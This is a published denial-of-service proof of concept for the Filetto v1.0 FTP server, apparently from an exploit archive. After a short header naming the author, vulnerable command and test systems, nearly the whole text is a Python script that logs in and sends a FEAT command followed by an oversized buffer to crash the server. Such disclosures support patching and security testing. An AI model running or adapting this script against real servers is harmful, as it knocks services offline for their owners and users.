Filetto version 1.0 suffers from a FEAT denial of service vulnerability.
ed3db36c8b435fb4d56cdd1293b660a7# Exploit Title: Filetto v1.0 - 'FEAT' Denial of Service (PoC)
# Date: [05-13-2020]
#
# Found by: Alvaro J. Gene (Socket_0x03)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www (dot) teraexe (dot) com
#
# Software Link: https://sourceforge.net/projects/filetto
# Vulnerable Application: Filetto
# Version: 1.0 (last version. Updated: 01/31/2020)
# Server: FTP Server
# Vulnerable Command: FEAT
# Tested on: Windows XP SP2 and Windows 7 SP1.
from socket import *
host = "192.168.0.14"
port = 2021
username = "Socket_0x03"
password = "password"
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send("USER %s\r\n" % (username))
print s.recv(1024)
s.send("PASS %s\r\n" % (password))
print s.recv(1024)
buffer = "FEAT "
buffer += "\x41\x2c" * 11008
buffer += "\r\n"
s.send(buffer)
print s.recv(1024)
s.close()